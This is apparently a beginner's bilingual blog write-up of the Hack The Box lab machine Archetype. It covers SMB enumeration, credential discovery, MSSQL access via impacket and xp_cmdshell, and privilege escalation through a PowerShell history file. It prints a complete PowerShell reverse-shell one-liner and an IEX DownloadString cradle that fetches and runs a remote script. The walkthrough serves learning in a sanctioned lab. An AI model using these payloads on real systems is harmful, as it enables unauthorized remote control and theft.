0x01-StartingPoint-Archetype

Help Desk

When reading through my long long article, somethings you should know in the first place.

  1. I included all my though process, so the article is very long. But I think to tell you guys what's going through my mind is really important, since why is more valuable than how.
  2. All the thought process will be in bold and italic.
  3. Side notes are wrapped between side notes title, ignore them if you don't want extra knowledge 😀
  4. If you are just looking for a solution, just go directly to my video, it's slate clean with every step demonstrated.

中文对照:

  1. 我将我的思考过程全部记录下来,所以文章变得很长。但是我觉得这才是正确的分享方式,因为 为什么怎么做 更重要。
  2. 所有思考过程,都用加上了粗体和斜体 (如果不想看,可以直接略过)。
  3. 有一些旁注(side notes),用一对旁注标签包裹起来,里面做了一些扩展,如果你不需要这些知识点,可以直接略过 😀
  4. 如果你只想看解决方案,那么就直接点击我的视频,里面有最直接的解决方法,快捷省时。

Archetype Walkthrough Video!:D

HTB-Archetype

Article in company with a video makes a perfect learning experience.

Today, I am delivering this write up of the first ever machine that I am going to hack.

I am what people call noob! I don't know nothing. I am completely an empty glass. So I will be logging each and every move that I take during the whole journey, until I am really really stuck, then I am going to check out some walk throughs written by others.

As we go along, the hacking process will be more and more systematic. I will form my own work flow in dealing with different kinds of problems. And that's good. Things are on the go and getting better and better.

I will also record a video, but the video is a redo, which means it will not contain any of the thought process, so it's clean and time-saving.

Let's get started.

Set up

The victim machine is at IP address 10.10.10.27.
victim
By the way, HTB needs you to set up a vpn to connect to its machines, refer to their tutorial, it's quite clear.

First things first - Nmap

I recall from my first lesson, everything starts with nmap, to list open ports and run some system scripts to find potential vulnerabilities.

Let's do it.

Nmap result here:

# Nmap 7.80 scan initiated Wed Apr 15 00:56:39 2020 as: nmap -sC -sV -p135,139,445,1433,5985,14803,47001,49664,49665,49666,49667,49668,49669 -o nmap.txt 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.25s latency).

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-04-15T02:23:29
|_Not valid after:  2050-04-15T02:23:29
|_ssl-date: 2020-04-15T05:12:26+00:00; +13m51s from scanner time.
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
14803/tcp closed unknown
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   unknown
49666/tcp open   unknown
49667/tcp open   unknown
49668/tcp open   unknown
49669/tcp open   msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h37m50s, deviation: 3h07m51s, median: 13m50s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-14T22:11:42-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T05:11:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 15 00:58:42 2020 -- 1 IP address (1 host up) scanned in 123.84 seconds

The most important info I can get from this scan is as follows:

139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM

The server is running Microsoft SQL Server 2017 14.00.1000.00, and samba.

First thing comes to mind is that, samba is notoriously known for its unreliability.

I want to narrow things down, and focus on this piece of information, cause I'm a noob 😀

Enumerate Samba

So, I googled for pentest samba list vunerabilities, and I read through three articles. This links are pasted below.

Enumerate Smb with smbmap

Samba Pentest

Kali docs for smbmap

The things I've learned so far, there are two tools now I can use to enumerate this samba service on the victim machine, one is smbmap, the other is smbclient.

I'll do them one by one.

smbmap
I read through the help message of smbmap, then tried lots of times, it's kind of unreliable, since nothing's been gathered.

Move to smbclient.

smbclient
This is much better now, just leave the root's password empty.

I tried to connect to each of the directories by issuing smbclient \\\\10.10.10.27\\[dirname] command, seems I can access backups directory with no authentication.

smbclient connect
Why four slashes? Seriously, I don't know. Just remember to do that.

I saw that there's a single file in the directory. Try to downlaod it and check the content.

smbclient download
get command will do it. And after download, just enter exit to exit smb.

Let's check the content.

prod.dtsConfig
Link to what is a dtsConfig file.

I like to do a grep for anything like password or pass or username, since these are all sensitive informations.

credentials found
That easy! The file does contain username and password info.

But, one thing that I should figure out is that, what is the username and password for? And how can I use them?

So, back to the info I gathered in the nmap step, I checked that there's a Microsoft SQL Server running on the machine. Best guess, the password and username is for that sql server.

Then, I have to figure out how to use the credentials to login to that sql server.

Need to google.

The first article, which contains whole lots of information, teaches me that since I've got the username and the password, I can do a ton of stuff about the sql server. To name but a few, I can enumerate MSSQL configuration setting, identifying SQL Server logins, identify Database owner, identify a User With admin privilege, execute SQL statement, etc.

Read it by yourself, you'll get hyped!

Quick note:
If it is the first time you run metasploit cli, do msfdb init first, and systemctl enable postgresql to start postgresql on system boot, this'll bring up msfconsole much quicker.

init msfdb
mssql payload
I tend to try this out. I have the password, and this wll gain us a meterpreter shell. Much excited!

options
set options
nc
I set all the options. Use nc to listen to port 9001, and let's exploit and pray.

options
Oh, and don't forget to set the lport to 9001 too, that is where the rever shell will be connecting to.

failed

Failure expected… I must have messed up the options.

options

I changed srvport to something else and let's try again.

options

It's because I don't have to set up nc to listen to port 9001. Be aware to turn off any nc listening on port 9001.

Credential problems. Options messed up again. Checking…

It just kept failing…

I tried auxiliary/admin/mssql/mssql_enum module, and first I got bad credentials again, meaning that I've messed up the username which I was pretty sure because there's slashed in the username (ARCHETYPE\sql_svc), so I remove the first part, leave the username as sql_svc, and with options USE_WINDOWS_AUTHENT false, I got bad creadential error again. So, I turned on the last option, set it to true, I got in and have the sql server enumerated.

enum
And this is an article about WINDOWS_AUTHENTICATION. Turned out sql server supports different types of auth. Go check it out!

Let's try the meterpreter shell again.

options
exploiting

It should work now 😀

failure
Nope. I had to check out other payloads, if nothing fit, I would search for other methods.

payloads
I would try revesr_http. Last attempt for this module.

reverse_http
Failed again. Let's just leave it and search for some other methods.

I go through my tools list agian and saw impacket. I googled impacket exploit mssql server, and this github page showed up.

Impacket mssqlclient.py Github

Let's check out the help message.

mssqlclient.py
I saw no proxy flag, because I do want to see what's going behind the screen. Never mind, I can do a tcpdump and use wireshark to check out the data.

tcpdump
I'm getting everything on tun0 here.

Let's connect with mssqlclient.py.

Side Notes Start

wireshark
tds
There's something to learn here, what is tds protocol? Follow the link to learn.

ntlmssp_auth
What is NTLMSSP_AUTH?

Because the message runs in TLS, there's not much I can extract. Just these two points worth reading.

Side Notes End

mssqlclient connection

I think I have to append the -windows-auth here due to prior readings. It works. We are in the sql server now.

MS SQL Server

What can I go from here?

The first thing I thought of is to check who am I on the server and it's privileges, in other words, is it admin or in the admin groups or something.

By googling microsoft sql server check user is admin, the command to check if a user is an admin role is found, and it's IS_SRVROLEMEMBER()

IS_SRVROLEMEMBER reference.

And this is the options that goes into the braces.

optoins

The one we need here I think should be sysadmin.

example

This is an example.

sysadmin

The command can either be uppercased or lowercased.
The server returned 1.

current_user
The current user is dbo and it's system admin, which means I can do whatever I want.

In this article, there's something called xp_cmdshell, it can execute arbitrary commands from within the server. Since I am now admin, I can do all kinds of crazy stuff.

Add a User to the System

Let's add a user to the system.
add user
Add user failed. And second thought, this is not an ideal way to do, because the user I add may not be admin.

cd
And I cannot access administrator directories.

Reverse Shell from Inside

Since I can do whatever I want, including uploading or downloading something.

Like when you get into a linux machine, it's like second nature to check if python or nc exists. I think when you're into a windows machine, you will have powershell at your disposal.

powershell
I can pass whatever commands directly to powershell to execute.

And now I can search for a shell, pass it to powershell, and let it execute it to connect to my machine, thus getting a shell on the machine.

I searched for powershell reverse shell, and I got this cheetsheet on reverse shells.

Open up nc to listen to port 9001.

And let's execute the reverse shell.

I chose powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", but got error.

在这里插入图片描述
The argument is too long.

Then I should use the third one to download and execute a script on my machine.

Save $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() to a file.

IMPORTANT NOTE:
If the above code should fail, just remove the 'PS' + (pwd).Path + '>' part, replace it with "# " and try again.

save shell file
And set up a python server to host the file.

http server

And use powershell IEX (New-Object Net.WebClient).DownloadString('ip/filename') to download and execute the file.

xp_cmdshell
user shell
whoami

Privilege Escalation

Notes:
When getting into a windows machine, read the powershell history file is a MUST DO!

powershell history
Got admin credentials.

I googled pentest login to windows with username and password, and found this page.

Impacket came up again with psexec.py.

Let's do it!

flag
I'm in…


SP_CONFIGURE

After checking the walkthrough, when I logged into the sql server, I also have to do sp_configure to set some options to 1 in order to make things all work. Show Adcanced Options and xp_cmdshell should all be set to one with exec sp_configure '[options]', 1;. Fortunately, the server is already configured that way.

This is still recorded into my video.